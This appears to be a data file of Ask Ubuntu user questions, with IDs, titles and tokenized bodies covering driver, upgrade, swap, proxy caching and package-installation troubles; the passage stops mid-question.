294259	installing programs	i 'm new with using linux , so i do n't know , how to install downloaded programms ( downloaded with firefox ) . could anybody please give me a discription . best would be in german , but english is ok too .
294264	installing the canon ir3530 on ubuntu 13.04	salam , i want to install the following printer on ubuntu 13.04 : canon image runner 3530 . so i went to system settings then printers , but unfortunately the specified printer is not listed in the list of printers . i have downloaded the ppd file for the specified printer , and after installing it an error occured said that there is something wrong in the configuration of the printer . i even download the driver of the printer . however when i wanted to install the rpm package an error occured said that there are failed dependencies .
294269	12 to 13 upgrade problems with video	i just finished upgrading my machine from 12 to 13 . i have a sell studio 17 that runs an intel mobile 4 graphics chip . after the upgrade i was met with the console , no gui . so i had to manually update my libraries and try to install gnome shell . it would n't install because of broken freeipa dependencies so i cleared those up and got it to install gnome shell , rebooted and the gui came back . but now , the driver does n't recognize my hdmi port . so i tried to play with that , and come to realize that it did n't load the intel driver at all . i apparently am running the generic driver . so i drop back to old reliable , apt-get and run a command and sure as hell , there is my libdrm-intel1 : i386 package , marked for autoremove . if memory serves , thats my video driver . it seems the developers of unity have gone to huge lengths to strip out any utility that gnome had that can help you diagnose hardware driver problems in favor of advertising , and this is the first time i have loaded a gui on ubuntu in probably 5 years ( typically i just run server and do everything by a console ) so i ca n't remember how to force feed a video driver down this things throat . anyone know how i can get this driver to load ?
294273	how to enable wi-fi on a hp 2000-2302tu laptop	i am using a hp 2000-2302tu laptop . in the system settings > network , there is no option for wireless . only wired and network proxy are available . i also searched in `` additional drivers '' and it does n't show any drivers to install .
294275	who created rhythmbox ?	i 'm writing an article about foss music players and was curious to know who created the rhythmbox music player project ? also why was it created ? was it because there was a lack of good music player applications for linux then ?
294277	how do i upgrade my code from dpkg-deb to dpkg-buildpackage	i inherited code that builds the .deb using dpkg-deb -b -zgzip -z9 debian ../ $ runner this works well , except that when the end user runs it , it refuses to install missing dependencies . instead it displays a message informing the user about the missing dependency . the answer - as has been said many times on this forum - is `` do n't use dpkg -b to produce the package , but use only dpkg-buildpackage -i -rfakeroot -d '' however , i keep on getting this error message when using dpkg-buildpackage : dpkg-source : error : hubmanager-test/debian/control does n't list any binary package dpkg-buildpackage : error : dpkg-source -i -- before-build hubmanager-test gave error exit status 255 i can not find any useful step-by-step instructions how to do it properly , nor a hint as to what to add tot he control file . background : i do not want/need dpkg-buildpackage to build the product ; it 's already built with both its executables ( one is a service that runs in the background ) and has all its graphics , etc . set up in a tree . '' the question is now : what is the secret for converting from from dpkg-deb to dpkg-buildpackage or what is dpkg-buildpackage looking for in the control file ?
294279	auto-hide launcher problem	i installed 13.04 just now . when i activated auto-hide launcher the purple background of it will not disappear at all . my laptop is vaio s137 . i had not this problem with 12.04 .
294285	where are evince bookmarks stored ?	evince has the option to add bookmarks . my question is simple ? where is the information about bookmarks stored ?
294288	which ubuntu version to install ( 12.04 or 13.04 )	i have windows 7 installed in my laptop . i have a lenovo g570 series laptop . i would like to install ubuntu . can anyone tell me which version to install ( 32-bit or 64-bit and 12.04 or 13.04 )
294290	how can i share ntfs drive between ubuntu pc	i am just installing ubuntu 12.04 in my office in two pc . every pc have some ntfs formated drive . so i want to share them between these two pcs . please help me regent if possible .
294292	how uninstall a program ?	how is a program uninstalled in ubuntu ? by internet search i know to go to system/administrator/something . where is this so-called `` system '' found ? what is this `` system '' ? system sounds important . is it possible to uninstall ubuntu one and ubuntu music and have their icons removed from the launcher ?
294312	swap not available in system monitor	i make a swap partition with 5 gb but i notice always that it is marked as `` not available '' on the system monitor plus when i do operations consume the whole ram ubuntu starts to kill to relief the ram with no use at all for swap i typed in terminal sudo mountall -v and this what i get mounted event handled for /proc/sys/fs/binfmt_misc local 1/5 remote 0/0 virtual 1/12 swap 0/1 mounted event handled for /sys local 1/5 remote 0/0 virtual 2/12 swap 0/1 mounted event handled for /sys/fs/fuse/connections local 1/5 remote 0/0 virtual 3/12 swap 0/1 mounted event handled for /sys/kernel/security local 1/5 remote 0/0 virtual 4/12 swap 0/1 mounted event handled for /dev/pts local 1/5 remote 0/0 virtual 5/12 swap 0/1 mounted event handled for /run/lock local 1/5 remote 0/0 virtual 6/12 swap 0/1 mounted event handled for /run/shm local 1/5 remote 0/0 virtual 7/12 swap 0/1 mounted event handled for /home/ahmed/.gvfs local 2/5 remote 0/0 virtual 7/12 swap 0/1 mounted event handled for /media/ubuntugeneralfiles local 3/5 remote 0/0 virtual 7/12 swap 0/1 mounted event handled for /media/once\040and\040for\040all local 4/5 remote 0/0 virtual 7/12 swap 0/1 mounting event handled for /tmp mounted event handled for /dev local 4/5 remote 0/0 virtual 8/12 swap 0/1 mounted event handled for /proc local 4/5 remote 0/0 virtual 9/12 swap 0/1 mounted event handled for /sys/kernel/debug local 4/5 remote 0/0 virtual 10/12 swap 0/1 mounted event handled for /run local 4/5 remote 0/0 virtual 11/12 swap 0/1 mounted event handled for /home/ahmed virtual finished remote finished local 4/5 remote 0/0 virtual 12/12 swap 0/1 mounted event handled for /tmp local finished all filesystems mounted local 5/5 remote 0/0 virtual 12/12 swap 0/1 this is fstab output # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdf1 during installation uuid=34c3c29b-e5dd-4ed7-a49b-616afded4704 / ext4 errors=remount-ro 0 1 # swap was on /dev/sdf2 during installation # uuid=9a7f0b9c-9be9-4074-8957-afcf25072bbe none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 /dev/disk/by-label/swap /mnt/swap auto nosuid , nodev , nofail 0 0 /dev/sdb2 /mnt/sdb2 ext4 nosuid , nodev , nofail 0 0 this is the output of sudo blkid ` /dev/sda1 : uuid= '' ac9c59ea9c59b016 '' type= '' ntfs '' /dev/sda2 : label= '' system '' uuid= '' c26cfb2e6cfb1c3b '' type= '' ntfs '' /dev/sda3 : label= '' once and for all '' uuid= '' 3ef60bd0f60b86fd '' type= '' ntfs '' /dev/sdb1 : uuid= '' 34c3c29b-e5dd-4ed7-a49b-616afded4704 '' type= '' ext4 '' /dev/sdb2 : label= '' swap '' uuid= '' 21cf04d1-6c18-4ab7-a8c3-ec435ab3f43e '' type= '' ext4 '' /dev/sdb5 : label= '' ubuntugeneralfiles '' uuid= '' e636244736241ad7 '' type= '' ntfs '' /dev/sr1 : label= '' etisalat 3.5g '' type= '' iso9660 '' ` sudo fdisk -l : disk /dev/sda : 1000.2 gb , 1000203804160 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953523055 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0d91aeaa device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 209717247 104755200 7 hpfs/ntfs/exfat /dev/sda3 209717248 1953519615 871901184 7 hpfs/ntfs/exfat disk /dev/sdb : 250.1 gb , 250059350016 bytes 64 heads , 32 sectors/track , 238475 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000001 device boot start end blocks id system /dev/sdb1 2048 236331007 118164480 83 linux /dev/sdb2 236333056 244148221 3907583 82 linux swap / solaris /dev/sdb3 244148222 488396799 122124289 5 extended /dev/sdb5 244148224 488396799 122124288 7 hpfs/ntfs/exfat` i dont know what is going on actually , so any help ?
294315	problems after upgrading to 12.04 lts	i am having some problems after upgrading to 12.04lts . wireless now wo n't connect , wireless adapter shows as unclaimed . sudo lshw -c network shows liz @ liz-n220 : ~ $ sudo lshw -c network [ sudo ] password for liz : *-network unclaimed description : network controller product : rtl8192e/rtl8192se wireless lan controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : ioport:2000 ( size=256 ) memory : f0100000-f0103fff i have performed sudo apt-get dist upgrade and have updated drivers through ubuntu but all to no avail . here is the output of dpkg -s rtl* | grep /lib/modules/ $ ( uname -r ) /kernel/drivers/net/ as requested in the comments : linux-image-3.2.0-41-generic : /lib/modules/3.2.0-41-generic/kernel/drivers/net/wireless/rtl818x linux-image-3.2.0-41-generic : /lib/modules/3.2.0-41-generic/kernel/drivers/net/wireless/rtlwifi linux-image-3.2.0-41-generic : /lib/modules/3.2.0-41-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192se/rtl8192se.ko linux-image-3.2.0-41-generic : /lib/modules/3.2.0-41-generic/kernel/drivers/net/wireless/rtl818x/rtl8180 linux-image-3.2.0-41-generic : /lib/modules/3.2.0-41-generic/kernel/drivers/net/wireless/rtl818x/rtl8187 linux-image-3.2.0-41-generic : /lib/modules/3.2.0-41-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192c/rtl8192c-common.ko linux-image-3.2.0-41-generic : /lib/modules/3.2.0-41-generic/kernel/drivers/net/usb/rtl8150.ko linux-image-3.2.0-41-generic : /lib/modules/3.2.0-41-generic/kernel/drivers/net/wireless/rtlwifi/rtlwifi.ko linux-image-3.2.0-41-generic : /lib/modules/3.2.0-41-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192ce linux-image-3.2.0-41-generic : /lib/modules/3.2.0-41-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192cu linux-image-3.2.0-41-generic : /lib/modules/3.2.0-41-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192de linux-image-3.2.0-41-generic : /lib/modules/3.2.0-41-generic/kernel/drivers/net/wireless/rtl818x/rtl8187/rtl8187.ko linux-image-3.2.0-41-generic : /lib/modules/3.2.0-41-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192ce/rtl8192ce.ko linux-image-3.2.0-41-generic : /lib/modules/3.2.0-41-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192se linux-image-3.2.0-41-generic : /lib/modules/3.2.0-41-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192cu/rtl8192cu.ko linux-image-3.2.0-41-generic : /lib/modules/3.2.0-41-generic/kernel/drivers/net/wireless/rtl818x/rtl8180/rtl8180.ko linux-image-3.2.0-41-generic : /lib/modules/3.2.0-41-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192c linux-image-3.2.0-41-generic : /lib/modules/3.2.0-41-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192de/rtl8192de.ko after entering still shows unclaimed $ sudo lshw -c network *-network unclaimed description : network controller product : rtl8192e/rtl8192se wireless lan controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress cap_list configuration : latency=0 resources : ioport:2000 ( size=256 ) memory : f0100000-f0103fff *-network description : ethernet interface product : 88e8040 pci-e fast ethernet controller vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 00 serial : 00:24:54:43:8b:92 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sky2 driverversion=1.30 duplex=full firmware=n/a ip=192.168.1.88 latency=0 link=no multicast=yes port=twisted pair speed=100mbit/s resources : irq:45 memory : f0200000-f0203fff ioport:3000 ( size=256 )
294324	how to start programming for this app in ubuntu 13.04	i want to create one application in ubuntu which should run in the background . it needs to be informed when the focussed window changes . basically i need to run a callback function in my application on window focus change event . i have never programmed anything in ubuntu . i am not sure how to move ahead .
294331	can i create an app for the ubuntu touch platform using pyqt ?	will i be able to create an app for the ubuntu touch platform targeted at phones and tablets using pyqt ? what are the options for writing apps for ubuntu touch using python ? thanks .
294332	stuck with dpkg	i am using ubuntu 13.04.i was installing a program and it had to download a file from the internet.it was a huge one.i waited for 30 minutes but nothing turned up.so i thought to let go and i closed the terminal.next time i open synaptic and i find it commanding meto runsudo dpkg -- configure when i do the same file download resumes.i am pretty sure that the file download does not complete as i have a very slow , frequently disconnecting net connection.so is there any way to stop this process and close the terminal safely.so that i can open synaptic and install programs as usual.thanks in advance .
294334	what 's the correct way to reassign keys with xkb ?	i have an apple keyboard with a swedish layout and this makes some characters very awkward to type , like right alt key and 7 to type a left brace . therefor i would like to reassign the right command key to have the same function as the right alt key . what is the correct way to achieve this with xkb ? my current solution is to load a modified dump from xkbcomp where i have swapped the keycodes for rwin and ralt but this feels like a hack . is anyone experienced with xkb ?
294336	fan noise and high battery consumption with amd hybrid graphics	as described here dell 7520 ( inspiron 15r se ) , fan on full speed on 12.04 , 12.10 , 13.04 , i still have problems with my energy comsumption and fan noise under ubuntu 13.04. i could reduce it to a minimum though with the following entries in /etc/rc.local like described how to permanently switch off discrete graphic card ? echo off > /sys/kernel/debug/vgaswitcheroo/switch echo `` min_power '' | sudo tee /sys/class/scsi_host/host*/link_power_management_policy the first command reduces battery consumption , the second one reduces fan noise . the entry in the rc.local makes sure to run the commands at startup . so far , so good . from time to time it is necessary to run the 2nd command again to silence the fans , for example after plugin the ac power or after resume . also after resume the discrete graphics card is running again . my question now : how can i make script or button to run the two commands as user with root rights without doing all that typing work in a terminal all the time , as a shortcut for example ? is there a more elegant solution so solve that issue ? by the way , if that is of any help . it seems like the fans start spinning immediately and together with minimum rise of cpu usage
294338	is it possible to download a bash script and execute it from a preseed file ?	i 'd like to do a untended installation iso . so i generated a preeseed file to run trough the installer automatically . but i miss the clue . is it possible to download a bash script with wget and run it with bash directly in the first users homedir ( where the first user is the user account created by the installer ) ? what would the commands in the preseedfile look like ? thank you so much in advance .
294342	manual to quickly : application preferences ?	where can one find a manual to quickly , where it is written about using ( =programming , how to connect widgets in preferencesdialogwindow with preferences , and how to use them in the application ) application preferences ? official tutorial tells nothing about it , although it is a very important aspect ( it is very short in general ... ) . edit : if it was not clear , i meant the standard ubuntu-application template , and preferences of the created application . asked the same question at so .
294343	contribute to the docky project	i 've recently installed docky and it seems to be a great app to have and i 'd like to contribute , or set up custom applets . is there any guide regarding this ? especially the language used and the format that needs to be followed .
294344	virtual mouse driver , possible problems with x11	i created virtual mouse driver according to essential linux device drivers book . after i wrote coordinates echo x y > /sys/ ... /coordinates into sysfs node , my program generates event packets through event interface /dev/input/event5 ( i checked this ) . this event interface is attached to the gpm gpm -m /dev/input/event5 -t evdev . but mouse do n't move . i asked this question on stackoverflow and figure out that there might be a problem with x11 configuration . is it possible ? what can interfere my driver work in this conditions ? i use ubuntu 11.04 on virtual box . thanks . maybe this will help : in xorg.0.log i see the following : [ 21.022 ] ( ii ) no input driver/identifier specified ( ignoring ) [ 272.987 ] ( ii ) config/udev : adding input device ( /dev/input/event5 ) [ 272.987 ] ( ii ) no input driver/identifier specified ( ignoring ) [ 666.521 ] ( ii ) config/udev : adding input device ( /dev/input/event5 ) [ 666.521 ] ( ii ) no input driver/identifier specified ( ignoring )
294345	error while starting docky	i installed docky today , and after a little bit of messing around , i closed it from the default launcher that ubuntu has ( i 'm on 12.04.2 ) , and after that whenever i click on the docky icon , nothing happens . it just doesnt load , when i tried running it from the terminal , it ran perfectly with all my settings intact , but that 's tedious , to run it from the terminal each time ie . any fix for this that is known ?
294348	teamviewer and remote access problem	i install teamviewer 8 on my ubuntu 12.10 ( 64-bit ) laptop . i can remotely connect to my windows 7 pc ( 32-bit ) , but when i try to connect from my windows 7 device to my ubuntu device , it works once perfectly , but if i try it again , it stops working . how can i fix that ? situation now : '' from - > to '' ubuntu - > windows 7 - > working windows 7 - > ubuntu - > not working . constantly says , `` connecting ... '' i can send messages from windows 7 to ubuntu , but i ca n't connect . i connected from my account on teamviewer 8 and i have devices added to my account .
294349	create pdf from inkscape svg without destroying fonts and effects	i have an inkscape svg file with a few transparency effects and different layers that i want to export to a pdf file for distribution . when i use `` save as ... '' or `` save a copy ... '' and select the pdf format , all the effects are garbled : top : expected output . bottom : actual output . i do n't mind flattening the image , loosing editing capabilities and whatnot in the process , since i still have the original .svg , but i ca n't find any options for it anyway . i 'd rather avoid exporting to a rasterized format , because i want to be able to use it for printing on large paper . when searching for solutions to this , among other things i found this thread , originally from 2006 , in which the most recent answer is from 2012 and reads 6 years later.. same problem . inkscape ca n't export to pdf level opacity . so sad . is there really no way to do this ?
294351	how do i disable unity in 13.04 ?	i 'm using xfce most of the time , but unity keeps popping up even in my xfce-session . so i deactivated the compiz-plugin in ccsm , because that worked well in 12.10 . but now with 13.04 as soon as i relog into my session , the plugin is active again . how can i stop this from happening ? i 'd rather not remove unity completely , because maybe i want to try something out once in a while .
294355	droid razr maxx hd and 13.04	i recently re-installed 13.04 on my laptop ( old partition crashed , pretty sure my hard drive is on the way out ) . i was using 12.04 previously , and had all but given up any home of getting my new phone , a droid razr maxx hd , to properly communicate with the os , since it does n't have the mass usb option , only mtp . i had heard that after upgrading to 13.04 everything would work natively , however this has not been the case . after plugging in my phone all that happens is i get a file system screen with windows driver install files ( .exe 's and all that jazz ) . if i switch it to ptp mode it recognizes it as a camera , but still no luck with mtp . has anyone gotten a droid razr maxx hd to connect successfully with their 13.04 installation ? if so , some help would be much appreciated . thanks !
294359	samsung 3401 - cant connect scanner	i downloaded samsung linux driver for my scanner cum printer samsung 3401 and when i click on folder , click on cdroot click on auto run i get this error '' ! /bin/sh base=dirname `` $ 0 '' exec sh `` $ base/linux/install.sh '' `` the printer is working , the scanner is not cd provided with the machine is also not working need help regards umesh
294363	wubi is downloading file but i have full iso	i have `` ubuntu-12.04.2-desktop-amd64.iso '' and my pc has windows 8 installed . in my previous windows i.e `` windows 7 '' i used wubi to install ubuntu 12.04.2 and installed and work correctly . now i try to install ubuntu 12.04.2 in windows 8 using wubi , it downloads the file . i have copied both ( ubuntu-12.04.2-desktop-amd64.iso and wubi ) in the same and empty folder but did n't work . pc specs : intel dg41wv motherboard . western digital 500 gb hard drive . os : windows 8 pro 2 gb ram
294367	does ubuntu touch support keyboard and mouse plugin now ?	i do n't have any device that ubuntu touch support now . i would like to know the test result before i buy one and try it . if it does n't support yet , will the function be supported in the future ? thanks in advance .
294368	suspend or hibernate ubuntu running from an external usb hard drive ( or flash drive ) ?	i have ubuntu 13.04 installed on a external usb hard drive and i have been using it without any major issues in different computers . however , i recently was working on something important and decided to suspend my ubuntu session in my pc at work . when i loaded my ubuntu os from a different computer , it loaded fine , but it did n't resume my old session . the day after i plugged in my usb hard drive with ubuntu at work and my ubuntu os started showing a number of errors , specially `` corrupted inodes '' . would this same issue happen if i had pt the system to hibernate rather than suspend it ?
294369	bluetooth is disable , unable to pair with any mobile	i am using ubuntu 12.04 on compaq v3000 . before few days i am able to use my laptop bluetooth services properly . but after update and upgrade is not working when i click on `` turn on bluetooth '' link , its turn on but add new device link , my old pair mobile device is not shown , and in network button my mobile number is not shown , when i click on `` bluetooth setting '' error shown `` bluetooth is disable `` and add new device ( +/- ) , visibility button is also disable now i am not able to connect my mobile with laptop bluetooth.unable to connect the network . i attached the screen shot also , please check http : //blogalokmohan.blogspot.in/2013/05/bluetooth-is-disable-error-in-ubuntu.html
294370	refresh linux kernels list	in boot directory i have a lot of files from previous versions . is there a simple way to remove not currently used versions ? when i install updates i can not see newly updated linux versions in grub menu . how can i refresh/reconfigure grub list to see allways lates linux versions ?
294374	brigtness setting for toshiba l745	i 'm trying ubuntu & i 've installed it on my toshiba l745 . but i ca n't set the brightness , i 've tried from setting and slide the brightness slider and still did n't work . please help me to set the brightness , the graphic card is nvidia without optimus1 and also the fn key seems do n't work . thanks , i 'm sorry for my bad english
294375	ca n't write in terminal	i 've just installed ubuntu 13.04 gnome , 64 bits on my computer ( keeping my old /home partition ) . but the providen gnome-terminal has a strange behaviour : it does not show me the prompt , and i ca n't write onto it ! ! ! is it a bad installation issue or a bug ? regards
294376	is gaming on ubuntu possible ( choice of games )	so im updating my old pc preferable for gaming . are the games ( mainly first person shooters ) on the market able to be played on ubuntu ?
294377	install ubuntu without creating a user account	i 'd like to sell an old computer of mine to a friend , and i 'd like to pre-install ubuntu . is it possible to install the os , but not set up a user account first ? i 'm expecting that it would ask the user to set up the account ( and choose a language , keyboard layout , timezone , etc . ) when the computer is booted up for the first time . basically , the type of prompt you would receive when you first boot up a new mac or windows machine . is there any way to do this on ubuntu ?
294379	weird bug in gedit - line numbers cut off on the left	gedit seems to have a bug - if the file has more than 9 lines , but less than 99 , the line numbers get cut off on the left side . does anyone have an an idea how to fix this ? i am running ubuntu 13.04 as a guest os in virtualbox . thanks for helping .
294380	after upgrading to 13.04 clicking on trash gives `` malformed url trash : // ''	after upgrading to 13.04 when i click on the trash can icon in the launcher to view files in the trash gives the following error `` malformed url trash : // '' . i checked and the `` ~/.local/share/trash/ '' folder is present . i searched and the only hit i can find is about kbuntu issues . i am not running kbuntu . thanks .
294381	how do i delete fedora 15 from ubuntu 12 ? fedora was installed first	i installed fedora 15 on my laptop and deleted xp ( at least i think xp is deleted ) . then i installed ubuntu as dual boot with fedora 15 . now i want to remove fedora 15 and leave only ubuntu ( and xp if it is still available ) . can anyone help with the steps to uninstall fedora ? please give me simple steps to follow , i 'm a nooby . thanks !
294390	oxygen-gtk theme on ubuntu 12.04	i tried to use the oxygen-gtk theme on ubuntu 12.04 , but it did n't work properly , only the menus . the windows looked like win95/98 : d i know that the best way to use that is to use kubuntu , but i found it really buggy ... so , is there a way to use that theme on unity ?
294392	launcher does not pop in - is out permanently	i have upgraded my ubuntu to 12.10 and the launcher is out permanently . it does not pop in thus my screen is smaller and very uncomfortable . is there any setting i can change to make it pop in and out again ? thanks
294395	libreoffice ppa in 12.04 update ?	i added ppa : libreoffice/ppa to my 12.04 install so i could install lo 4 , and my only question is : will lo update through the ppa by itself when a new version is out , or will i have to do it manually ?
294403	how to save songs from spotify on pc	it 's first time i 'm using spotify and i installed spotify for linux on my ubuntu . i can listen to musics but i do n't know how to download them on my pc or does it save songs on pc in a feature folder ? please help me .
294407	full disk encryption & boot partition from a cd	i would like to try enabling full disk encryption under ubuntu 13.04 . i would also like to put my boot partition on a burnt cd-r , rather than unencrypted on the hdd . a cd-r has a number of advantages over the hdd or usb flash option . it is non-volatile , files ca n't be changed and can be permanently marked/signed ( so ca n't be swapped ) . the idea is to use the cd at boot time . can someone please advise how i can go about this ? thank you for your time .
294408	how to make the top bar menu always visible ?	i just recently started working on ubuntu , coming from osx . i work a lot with the computer so i naturally want everything to look and work the way i want it to . ubuntu has not let me down yet , but the auto-hiding menu is driving me nuts . how do you deal with it ? is there an easy work-around ? i managed to display the menu for only 10 seconds . i want this menu to be visible at all times i 'm using ubuntu 13.04 64-bit if that 's any help .
294415	dynamic switch between audio ( applications ) source	formuling a question was quite hard : ) i would like to know if there is a way to force the soundoutput to play the last audio stream started , reduce the volume of the actual audio source and when the playback is finished , increase the volume of the first source playing . concretly : i 'm listening music with rhythmbox i 'm surfing on the web on chrome/moz and start a youtube video the audio playback of rhytmbox stop ( or volume to 0 ) the audio playback of youtube ( chrome/moz ) start when the video is finished , the playback of rhythmbox start again . i 'm listening music 99 % of the time i 'm on my computer and i feel stupid to have to stop/start everytime i want to watch a video . and i 'm making this 10000 times a day i was wondering if there is any existing solution for this . hope i 'm understandable : ) gruă , h .
294420	squid-deb-proxy failing to cache packages	on an ubuntu 12.04 server , with squid-deb-proxy installed , client machines on the network will properly contact the server when installing packages , but squid never caches packages . from /var/log/squid-deb-proxy/access.log : 1368371692.721 485 192.168.1.220 tcp_miss/200 20304 get http : //us.archive.ubuntu.com/ubuntu/pool/universe/c/cowsay/cowsay_3.03+dfsg1-3_all.deb - direct/91.189.91.13 application/x-debian-package 1368371721.534 264 192.168.1.210 tcp_miss/200 20304 get http : //us.archive.ubuntu.com/ubuntu/pool/universe/c/cowsay/cowsay_3.03+dfsg1-3_all.deb - direct/91.189.91.13 application/x-debian-package both 192.168.1.220 & .210 contacted the server ( .210 is the server , but also has squid-deb-proxy-client installed ) , but .210 received tcp_miss/200 , instead of being served the cached package . from /var/log/squid-deb-proxy/store.log : 1368371692.721 release -1 ffffffff 1255c76ae7e24ba02b4abb6a3e4ab535 200 1368371672 1293023126 -1 application/x-debian-package 19904/19904 get http : //us.archive.ubuntu.com/ubuntu/pool/universe/c/cowsay/cowsay_3.03+dfsg1-3_all.deb 1368371721.534 release -1 ffffffff 3534fa3574ed95020e8c960c75129676 200 1368371700 1293023126 -1 application/x-debian-package 19904/19904 get http : //us.archive.ubuntu.com/ubuntu/pool/universe/c/cowsay/cowsay_3.03+dfsg1-3_all.deb if i 'm reading the store.log right , squid cached two copies of the exact same file . ( i used cowsay to test ; much larger files , like linux-headers-* also were never cached . ) the only changes from the default squid-deb-proxy.conf were to enable mirrors : 81,82c81,82 < http_access deny ! to_ubuntu_mirrors < # http_access allow ! to_ubuntu_mirrors -- - > # http_access deny ! to_ubuntu_mirrors > http_access allow ! to_ubuntu_mirrors 86,87c86,87 < cache deny ! to_ubuntu_mirrors < # cache allow ! to_ubuntu_mirrors -- - > # cache deny ! to_ubuntu_mirrors > cache allow ! to_ubuntu_mirrors lastly , the only errors i have seen in squid-specific logs are : $ sudo cat /var/log/upstart/squid-deb-proxy.log.1 2013/05/09 09:27:05| warning : empty acl : acl blockedpkgs urlpath_regex `` /etc/squid-deb-proxy/autogenerated/pkg-blacklist-regexp.acl '' 2013/05/09 09:27:05| warning : ( b ) ' : :/0 ' is a subnetwork of ( a ) ' : :/0' 2013/05/09 09:27:05| warning : because of this ' : :/0 ' is ignored to keep splay tree searching predictable 2013/05/09 09:27:05| warning : you should probably remove ' : :/0 ' from the acl named 'all' given that the clients are correctly contacting the server 's proxy , why wo n't squid cache & return the packages ?
294421	how do i install nemo file manager ?	how do i install nemo file manager , a fork of nautilus 3.4 by the linux mint team ?
294425	hdmi audio not working on hybrid graphics	i have an hp pavilion dv6 laptop with intel sandybridge hd3000 / ati radeon 6490m switchable graphics . i am not very experienced in ubuntu or linux in general but i have installed 13.04 64bit , because i am hoping to switch from being a long-term windows user . everything seems to be working apart from audio over hdmi . i know there are no hardware problems because it works on windows 7 64bit . from a fresh install , none of the drivers suggested to me automatically work , so i used the method here : how do i get amd/intel hybrid graphics drivers to work ? and managed to install the solution offered for 13.04 . for all the proposed solutions , i can get video through hdmi but no sound , but for the above method even the video is buggy through hdmi . at no point can i see hdmi sound output under sound settings . thank you in advance for your help .
294428	is it possible to have just opened apps on top in launcher ? if so , how ?	i 've locked ( 'pinned ' ) quite some applications to the unity launcher . when i open a programme ( via the dash ) , its icon appears at the very bottom of the list . this is very annoying imho as it leads to more mouse movements which require more precision ( esp . annoying with a touchpad ) . is there some way to make the icons of newly opened applications appear on top of the launcher ?
294429	virtuoso-t cpu usage increases a lot when kmail is launched	this relates to kubuntu 13.04 . it is a clean install into a clean /home folder . when i launch kmail the cpu usage of the virtuoso-t process increases by a huge amount . i have an i5 laptop and the usage of that process before kmail is launched is below 1 % a few moments after kmail is launched the process usage shoots up to 150 % + ( so atleast one and a half cores are being maxed by the virtuoso-t process ... ) . if this settled after a few hours it would be ok , but it does n't seem to settle down and there is no clear way of seeing what is being done or if it is only a zombied thread inside virtuoso . being a laptop this of course completely destroys battery life . the sad thing is that i mainly use the laptop for email ( due to it being mobile ) while on the road and as such needs the auto complete of contact 's email address and the semantic features . is there a way to determine if this process is indeed zombified and looping or if it is actually indexing the email . but what confuses me is why would nepomuk only want to index emails when kmail is open ? surely it has access to the local email headers in the same way kmail has ? ? kind regards , george
294438	wireless signal very weak after uprading to ubuntu 13.04	if the additional driver broad corporation bcm4313 802.11b/g/n wireless lan controller is activated ( bcmwl-kernel-source ) , i can see all available wireless network spots , but i ca n't connect to none of them . it keeps trying , but no connection is established . but if i do n't use the driver , connection can be established but with a very weak signal , the laptop must be very close to the router . can anyone help me ?
294441	usb emulated cdrom drive is not automounting ( repurposed u3 smart usb stick )	i 've used u3-tool to load a iso onto my 2mb usb stick . if i 'm running 13.04 or 12.04 and i place the flash drive in my pc , the remaining ~923mb fat32 partition auto-mounts , but not the emulated usb-cdrom part . i retested this in an old 9.10 ( or 9.04 ? ) system and both partitions were auto-mounted . since these awesome flash drives are pretty rare nowadays , i 'm wondering if this is a bug or the expected behavior . if it 's a bug , what data would i gather before submitting a bug report ? workaround and more info : the drive is clearly recognized in dmesg and you can ( as root ) create a mount point with mkdir and then mount it using the mount command . as a normal user , you can ask root to install pmount , and then : ls -ltr /dev/sr* # lists cdrom drives by reverse date , you probably want the newest . pmount /dev/sr1 # mount the drive automagicly on /media/sr1 as type iso9660
294442	how can i update libreoffice to 4.0.3 ?	my version of libreoffice is 4.0.2.2. and 4.0.3 was released three days ago . should i add ppa in order to get updated or my ubuntu 13.04 will update automatically after few days ?
294447	chpasswd silently fails to do anything ; is there a substitute ?	after a series of break-in attempts , i generated new random passwords for all the users on my ubuntu 12.04.2 lts server running virtualmin and then , as root , used chpasswd to change their passwords . i had a couple of user names wrong , and chpasswd detected this and correctly reported the lines with the wrong names , which i corrected . then i started to get feedback from the users that their passwords were n't changed ... well , it seems that chpasswd does n't seem to have done anything at all - but neither has it reported any sort of error , either on the command line or in any log that i found . passwd does change passwords - but unfortunately passwd on ubuntu does n't seem to accept the -- stdin option , so i 'd have to do all the password changes by hand one at a time - for almost a hundred accounts . ( and i might want to do this again at some point ... ) is chpasswd simply broken , or is there some way i can make it work ? or , is there some substitute for it ? and - should i be reporting a feature deficiency somewhere ? i do n't believe that `` failing silently '' is a good result . perhaps there 's something on my system ( which uses virtualmin for domain management but is otherwise quite vanilla ) that prevents it from working - but if so , chpasswd should be able to detect 